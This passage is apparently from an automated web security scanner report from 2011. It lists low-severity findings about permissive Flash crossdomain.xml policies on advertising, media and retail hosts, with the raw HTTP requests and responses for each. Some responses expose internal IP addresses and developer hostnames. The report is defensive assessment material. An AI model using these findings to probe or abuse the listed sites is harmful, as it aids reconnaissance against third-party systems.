<allow-access-from domain="*.tubemogul.com" />
...[SNIP]...
<allow-access-from domain="*.adap.tv" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" />
...[SNIP]...
<allow-access-from domain="*.tidaltv.com" />
...[SNIP]...

4.76. http://ads.adsonar.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.adsonar.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:56:44 GMT
Server: Apache
Last-Modified: Tue, 07 Apr 2009 17:58:21 GMT
ETag: "a3d-466fac2afc940"
Accept-Ranges: bytes
Content-Length: 2621
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=150, max=896
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="assets.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.quigo.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lonelyplanet.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mochila.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.conxise.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="app.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.digitalcity.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn-startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channels.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channel.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.web.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.my.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.news.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="imakealpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " secure="false" />
...[SNIP]...
<allow-access-from domain="*.spinner.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.popeater.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.theboombox.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.opticalcortex.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yourminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.liveminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.lightningcast.com" to-ports="*" secure="false" />
...[SNIP]...

4.77. http://ads1.msn.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads1.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads1.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Date: Tue, 06 Sep 2011 15:00:14 GMT
Content-Length: 616
Content-Type: text/xml
Last-Modified: Thu, 12 May 2011 21:35:14 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Expires: Sat, 30 Jun 2012 12:49:00 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="global.msads.net" />
<allow-access-from domain="msnbcmedia.msn.com" />
<allow-access-from domain="*.msnbc.msn.com" />
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msads.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn-int.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn-int.com" secure="false" />
...[SNIP]...

4.78. http://adx.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adx.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adx.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=ISO-8859-1
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Tue, 06 Sep 2011 17:05:55 GMT
Expires: Wed, 07 Sep 2011 17:05:55 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.79. http://assets1.csc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://assets1.csc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: assets1.csc.com

Response

HTTP/1.0 200 OK
x-amz-id-2: FcnyXqPak36cLwKPUi1HA56iJfWYFNUtUM95uLnVRd/JmKoOs3CeXukpfMrEdpbc
x-amz-request-id: 9A44AC709A32B889
Date: Tue, 06 Sep 2011 15:57:47 GMT
Last-Modified: Thu, 03 Jun 2010 19:56:13 GMT
ETag: "31616154d66e52c8a5f79d34e7fa229a"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 256
Server: AmazonS3
X-Cache: Miss from cloudfront
X-Amz-Cf-Id: ee9cad8e5f3b5b709b20cb0f6ea0020c8921721e47f4c95b539bdba55cfb09358c2ee8f9cae47b93,41028218a4b1860c2975b885931132835d738f7494f9734ced53465bad11a658a47fd29a3b9917d4
Via: 1.0 db26aad8eddbf74ac3abe77abd5de63f.cloudfront.net:11180 (CloudFront), 1.0 23d5f9ecd89e26f0c254accbbb676a22.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.csc.com" />
<allow-access-
...[SNIP]...

4.80. http://blogs.oracle.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://blogs.oracle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: blogs.oracle.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Last-Modified: Sat, 16 Jul 2011 10:06:38 GMT
X-Robots-Tag: noindex,follow
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=214587153+0;age=2083326;ecid=51608497101082732,0:1)
Content-Length: 392
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:12:52 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-onl
...[SNIP]...
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="*.sun.com"/>
...[SNIP]...

4.81. http://bstats.adbrite.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bstats.adbrite.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: bstats.adbrite.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Content-Length: 398
Server: XPEHb/1.0
Accept-Ranges: none
Date: Tue, 06 Sep 2011 15:32:13 GMT

<?xml version="1.0" encoding="UTF-8"?>
<!-- AdBrite crossdomain.xml for BritePic and BriteFlic -->
<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.adbrite.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...

4.82. http://channelsun.sun.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://channelsun.sun.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: channelsun.sun.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/2.5
Server: Sun GlassFish Enterprise Server v2.1
ETag: W/"872-1302718369000"
Last-Modified: Wed, 13 Apr 2011 18:12:49 GMT
Content-Type: application/xml
Content-Length: 872
Date: Tue, 06 Sep 2011 16:13:10 GMT

<cross-domain-policy>
<allow-access-from domain="*.oracle.com"/>
<allow-access-from domain="oracle.com"/>
<allow-access-from domain="www.oracle.com"/>
<allow-access-from domain="presenter.oracle.com"/>
<allow-access-from domain="streaming.oracle.com"/>
<allow-access-from domain="web148.oracle.com"/>
<allow-access-from domain="http://72.47.210.156"/>
<allow-access-from domain="http://216.70.88.224"/>
<allow-access-from domain="events-mktas.oracle.com"/>
<allow-access-from domain="events-mktap.oracle.com"/>
<allow-access-from domain="eventreg.oracle.com"/>
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="admin.brightcove.com"/>
<allow-access-from domain="www.oracleimg.com"/>
<allow-access-from domain="medianetwork.oracle.com"/>
<allow-access-from domain="*.akamai.com"/>
<allow-access-from domain="*.omniture.com"/>
...[SNIP]...

4.83. https://cms.paypal.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://cms.paypal.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cms.paypal.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 10 Jun 2008 20:10:41 GMT
Accept-Ranges: bytes
Content-Length: 312
Content-Type: application/xml
Expires: Tue, 06 Sep 2011 17:06:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 17:06:25 GMT
Connection: close
Set-Cookie: BIGipServerpool_cms.paypal.com_443=455494154.26702.0000; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.paypal.com" />
<allow-access-from domain="*.ebay.com" />
<allow-access-from domain="*.paypalobjects.com" />
...[SNIP]...

4.84. http://cnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: cnbc.com
Proxy-Connection: keep-alive
Referer: http://media.cnbc.com/i/CNBC/Components/Promos/_app/promoBox_auto.swf?delay=0&config=24596694&v=7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; __qseg=Q_D; s_nr=1315339052241; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CBlog%25257CAllT%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/id/15837856/site/14081545/%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 31 May 2011 22:37:42 GMT
Accept-Ranges: bytes
ETag: "0ff4d5ae31fcc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Connection: Keep-Alive
Date: Tue, 06 Sep 2011 14:57:41 GMT
Age: 2384
Content-Length: 3839

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.atdmt.com"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.imwx.com" />
...[SNIP]...

4.85. http://cvs.shoplocal.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cvs.shoplocal.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cvs.shoplocal.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Fri, 12 Aug 2011 18:31:01 GMT
Accept-Ranges: bytes
ETag: "7b77bcfc1d59cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT"
Content-Length: 5330
Date: Tue, 06 Sep 2011 17:06:25 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.crossmediaservices.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.shoplocal.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.target.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.publix.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.homedepot.com" />
<allow-access-from domain="weeklyad.lowes.com" />
<allow-access-from domain="instorespecials.staples.com" />
<allow-access-from domain="weeklyad.staples.com" />
<allow-access-from domain="weeklyad.cvs.com" />
<allow-access-from domain="weeklyad.circuitcity.com" />
<allow-access-from domain="www.jcpstoreads.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="192.168.0.251" />
<allow-access-from domain="10.200.1.53" />
<allow-access-from domain="10.200.1.59" />
<allow-access-from domain="10.200.1.61" />
<allow-access-from domain="v-devweb1" />
<allow-access-from domain="d-pshahrava" />
<allow-access-from domain="192.168.0.9" />
<allow-access-from domain="192.168.0.10" />
<allow-access-from domain="192.168.0.111" />
<allow-access-from domain="192.168.0.36" />
<allow-access-from domain="172.16.200.22" />
<allow-access-from domain="172.16.200.23" />
<allow-access-from domain="d-dmoore2" />
<allow-access-from domain="vqascweb1" />
<allow-access-from domain="vqascweb2" />
<allow-access-from domain="localhost" />
<allow-access-from domain="devweb1" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.pointroll.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.pointroll.com" secure="true" />
...[SNIP]...
<allow-access-from domain="data.pointroll.com" secure="true" />
...[SNIP]...
<allow-access-from domain="speed.pointroll.com" secure="true" />
...[SNIP]...
<allow-access-from domain="mirror.pointroll.com" secure="true" />
...[SNIP]...
<allow-access-from domain="geo.pointroll.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="ad.doubleclick.net" />
<allow-access-from domain="m.doubleclick.net" />
<allow-access-from domain="m2.doubleclick.net" />
<allow-access-from domain="m3.doubleclick.net" />
<allow-access-from domain="m.2mdn.net" />
<allow-access-from domain="m1.2mdn.net" />
<allow-access-from domain="m2.2mdn.net" />
<allow-access-from domain="creatives.doubleclick.net" />
<allow-access-from domain="motifcdn2.doubleclick.net" />
<allow-access-from domain="motifcdn.doubleclick.net" />
<allow-access-from domain="*.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="dfa.doubleclick.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.atdmt.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.ippixel.com" />
<allow-access-from domain="www.wearepixel.com" />
<allow-access-from domain="www.yourlexusdealer.com" />
<allow-access-from domain="yourlexusdealer.com" />
<allow-access-from domain="devcpd1.yourlexusdealer.com" />
<allow-access-from domain="staging.yourlexusdealer.com" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="zshalla.desktop.amazon.com" />
<allow-access-from domain="snowbank.amazon.com" />
<allow-access-from domain="weeklyad.amazon.com" />
<allow-access-from domain="d-trobertson" secure="false"/>
...[SNIP]...
<allow-access-from domain="vmu-shd-fb1.sf.akqa.com"/>
<allow-access-from domain="tarjoukset.hs.fi" />
<allow-access-from domain="8.17.173.144" />
<allow-access-from domain="www.targetweeklyadapps.com" />
<allow-access-from domain="*.intellitxt.com" />
<allow-access-from domain="*.richrelevance.com" />
<allow-access-from domain="devcpd2.yourlexusdealer.com" />
<allow-access-from domain="dev.big5.adhostclient.com" />
<allow-access-from domain="big5sportinggoods.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.big5sportinggoods.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.sears.com" />
<allow-access-from domain="*.kmart.com" />
<allow-access-from domain="*.facebook.com" />
<allow-access-from domain="*.designkitchen.com" />
<allow-access-from domain="*.michaels.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.bonton.com" />
<allow-access-from domain="*.elder-beerman.com" />
<allow-access-from domain="*.carsons.com" />
<allow-access-from domain="*.bostonstore.com" />
<allow-access-from domain="*.younkers.com" />
<allow-access-from domain="*.parisian.com" />
<allow-access-from domain="*.herbergers.com" />
<allow-access-from domain="*.bergners.com" />
<allow-access-from domain="flyer.canadiantire.ca" />
<allow-access-from domain="circulaire.canadiantire.ca" />
<allow-access-from domain="cdn.uc.atwola.com" />
<allow-access-from domain="*.workalicious.com" />
<allow-access-from domain="*.liquidus.net" />
<allow-access-from domain="ec2-67-202-62-111.compute-1.amazonaws.com"/>
<allow-access-from domain="ec2-184-72-169-190.compute-1.amazonaws.com"/>
<allow-access-from domain="*.washingtonpost.com"/>
<allow-access-from domain="69.20.118.121" />
<allow-access-from domain="*.startribune.com" />
...[SNIP]...

4.86. http://data.cnbc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://data.cnbc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: data.cnbc.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:07 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Wed, 01 Apr 2009 19:06:33 GMT
ETag: "12a-46683038a8040"
Accept-Ranges: bytes
Content-Type: application/xml
Via: 1.1 aicache6
Content-Length: 298
X-Aicache-OS: 64.210.194.245:80
Connection: Keep-Alive
Keep-Alive: max=20

<?xml version="1.0"?>
